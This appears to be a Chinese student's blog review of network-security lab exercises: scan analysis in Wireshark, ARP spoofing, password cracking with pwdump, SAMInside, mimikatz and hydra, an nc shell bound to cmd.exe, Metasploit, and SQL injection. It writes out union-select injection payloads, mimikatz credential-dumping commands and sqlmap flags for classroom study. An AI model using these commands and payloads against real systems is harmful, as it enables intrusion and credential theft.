• 这篇作为我实验的补充都不太能算总结,太菜了,重新做了一遍发现好多问题,有的是之前做的不够好,有的是之后发现还有问题,希望大家不要向菜娴学习,,太不认真了


    从实验一开始吧

    首先第一个问题在于怎么判断是全连接还是半连接扫描,然后我当时直接用人眼看的(真的菜)然后后来老师讲了以后,,我又看了zz的博客,学到了。

    方法就是先用tcp.flags.ack==1&&tcp.flags.syn==1过滤,这个过滤得到的是什么包呢,是那些端口开放的发的包,所以可以知道哪些端口是开放的,最后得到的这个和nmap扫描出来的端口是一致的。

    然后我们就知道哪些端口是开的了,有两种方法判断它是全连接还是半连接(或许还有超级多种)

    这个是第一种方法,就是我们从上面过滤结果知道25号端口是开放的,然后我们过滤tcp.port==25,看一下这个扫25号端口进行的操作。

    这个图很清楚了,就是半连接扫描。

    然后还有一种更简单,直接在第一次过滤完,点一条指令追踪流就可以,看一下TCP流。

    这个好像更简单一点,不过两个都有一个共同点吧,就是还是找一些比较不是特别会干别的事的端口,比如我现在这组包你过滤http就发现他还有三次握手。

    同样全连接扫描也可以用同样的方法,(其实全连接扫描就只是多一个ack的包,也可以过滤这个包)

    然后实验一别的东西就是上网查,就记住一些网址就行了

    实验二是ARP欺骗还有DNS,这个DNS的这个就是自己再用虚拟机做就老不成功了网不太行,ARP欺骗还行。还有一个事就是那个FTP的事,试了一下压缩包会发生什么问题,然后再用实验三的工具解压啥的。

    ARP欺骗的问题,后来用电脑和虚拟机也成功了,无非就三点,第一会操作,第二用arp-a看有一样的,第三分析数据包,这个数据包我用当时实验室抓的那个,,挺有意思,还有别人做的欺骗。

    首先这个指令居然是我后来看我师兄笔记的时候才知道的,真的太菜了呜呜,1是广播的请求包,2是回复包。

    然后这个可能wireshark版本比较高吧,然后可以看到有一个IP被重复用了,经过我的不严谨考证,这个IP还有它括号里面那个,他俩就是被欺骗的那俩IP

    他俩这个时候的mac地址应当是一样的吧,应该都等于那个欺骗的人的MAC地址 同时,这个MAC地址应该也是这个底下我选中的那个sender MAC address对应的,就是坏蛋的。

    然后我就在想一个事,他这个黄色的这个地方,这两个mac地址,除了被欺骗的那个,剩下那个应该是他真实的吧,就是没有欺骗之前的,它给回复的。

    通过报文还可以分析出,这个实验室别人应该还在做,欺骗了网关(好多好多次)还有.55的.66的。

    DNS那个就是先ARP欺骗了,然后把域名对应的IP改了,感觉这个应该抓的包是,ARP欺骗某人和网关,然后就是Ping的话就是icmp包的目的ip那个就是假的。

    然后这个就告一段落,说ftp包那个事,上传了一个zip文件,我一开始居然恢复失败了,后来才成功。(之前实验是成功的)

    被自己蠢到,这个最后保存的时候要用原始数据,ascall码打不开的,亲测有用。还有就是那个文件类型,直接看当时上传的文件叫什么就行了,或者看那个ascall码开头虽然我也记不住。

    stor是上传,你看那个o多像一个太阳,它一定在上面,所以是上传,剩下那个就是下载(我真的记不住就这样吧)

    然后实验二就这样吧我感觉差不多了

    说一下实验三 这个东西可真多 我得稍微理一下

    首先是第一个问题,这些软件都是干啥的

    如果有一串密码 那就上网有的网站在线解密一下就完事了 

    密码这些软件都是干啥的

    要是windows密码破解 需要用两个东西

    一个是那个pwdunp7那个东西(书上写的6 还有啥3e)这个东西来抓取sam文件 它的指令就是一个重输出>到一个txt文件里面

    然后dir找一下看一下有没有 在哪儿 就行了

    然后第二步就用那个saminside破解 我这儿踩过一点小坑

    这个图仅作参考了,就是要在audit里面选上你要破解的方式是爆破还是字典(爆破真的太慢了我也没办法,,老师您考试一定要给字典奥~)然后再option里面操作一波

    选的那个sam文件得是这个类型 pwdumpfiles别的不行

    还有一个是猕猴桃那个minikatz(我就叫他猕猴桃,因为它点那个运行)这个是内存密码破解,就是对你主机里面的密码破解,我这个你用什么权限或者什么身份就可以破解什么身份的密码(言外之意,不是那个人不行)

    这个指令一共就两条但是我还老输错(太菜):一条是privilege::debug

    另外一条是serkurlsa::logonpasswords 现说一下我的错误原因:第一 privilege拼不对还自己着急半天,这个没有d,然后第二个是serkurlsa拼不对,passwords有s

    这个不截图了 还得p图

    然后还有一个工具是hydra这个,这个是远程密码破解,就是别人搭了一个服务器,你只知道它的IP和用户名,而不知道它的密码,这儿用它来破解

    这个指令也挺少的 就是-l 用户名 -P字典 ftp://ip就这样就行 但是P要大写 小写加密码

    然后就是还有一个shadow密码破解

    这个需要一个工具john the ripper(等我做完)

    实验四是关于木马的

    我nc连接主机时候都会出问题,端口应该现在被控制者处开启,然后在控制者这儿去访问它的IP和端口,这个实验里面是一个主动攻击(其实还有被动的)

    被攻击者-l -p端口-e cmd.exe 攻击者直接nc ip 端口就完事了 ipconfig看一下

    然后我突然想起来我之前踩的一个坑,这个事就是我net localgroup那个地方的错,administrator有s!!!

    真的受不了了 太菜了

    然后木马其实没啥,主要是火绒剑这个东西搞了我好久,,,原因是每次没卸载干净木马,而且每次开监控开晚 ,其实就在木马开始之前就得开监控

    过滤的时候 修改注册表自启动项 重命名文件 还有自删除 

    这都很容易就过滤掉了

    然后可以看进程啥的都可以 进程里面有他那个进程还可以看他的TCP 这个是启动项里面有个未知

    然后就还有个msf这个踩坑一个是easyfile都得选上端口该改的改,一个就是msf你得看你的端口和IP对不对要不要改,指令就是 search use show options set rhost set rport run也就没啥 然后sysinfo然后就还可以screenshot

    有shell以后可以控制了ftp下个木马用get一下(当时他们还说可以直接run了这个木马)

    最后一张screenshot后的你控制的那个人的桌面

    然后最后我得总结一下SQL注入,也不知道考不考,

    一共就几个,如果输了个'报错说明有注入点

    输入‘or '1=1'#返回所有 如果数字格式那个本身就是 那就不用一个'都不要

    输入 order by 5看看行不行 就这个看啥时候不行了 他是列数的那个

    然后union select 1,2,3,4

    union select 1,version(),3,4

    union select 1,table_name,3,4 from information_scema.tables

    union select 1, colunm_name,3,4 from information_scama.colunms

    这两条返回的表名还有列名

     特!别!注意!我真的爱死这个sqlmap了,救命

    做完了,请问我干了什么吗,就是一傻瓜操作

    然后说一下手工注入

    这个步骤一共也就几个(我居然练了一上午)

    ’ and 1=2 --+

    ' order by 3--+

    id=-1' union select 1,database(),3--+

    id=-1' union select 1,database(),table_name from information_schema.tables where table_schema=''--+

    id=-1'union select 1,database(),column_name from information_schema.column where table_name=''--+

    id=-1'union select 1,database(),group_concat(列名) from 表名--+

    就这样 用sqlmap的话就-u --dbs  -D--tables -T--dump就完事了 sql注入主要是先找注入点,猜一共几列,猜数据库名,表、列名然后就完事了好像也不太难哈哈

    数据包分析总结:一般都在传的包里面有东西,可以追踪流看里面的东西,有可能是加密了的,就解个密就行了,有的就直接在里面。

    还可以导出http和ftp包 别的我也不太会哈哈

    爱了爱了,就是用来拯救我这种笨小孩的

  • 相关阅读:
    电工知识:3种方法测电容的好坏,万用表三个档位的巧妙应用
    ps 教程
    绘声绘影 设置不联网
    推荐.Net、C# 逆向反编译四大工具利器
    MOOC 网站:Coursera、Udacity、edX
    深度强化学习资料(视频+PPT+PDF下载)
    李飞飞、吴恩达、Bengio等人的15大顶级深度学习课程
    tf.name_scope()和tf.variable_scope()
    Linux 进程(一):环境及其控制
    Linux I/O总结
  • 原文地址:https://www.cnblogs.com/p201821460042/p/lzx2000.html
Copyright © 2020-2023  润新知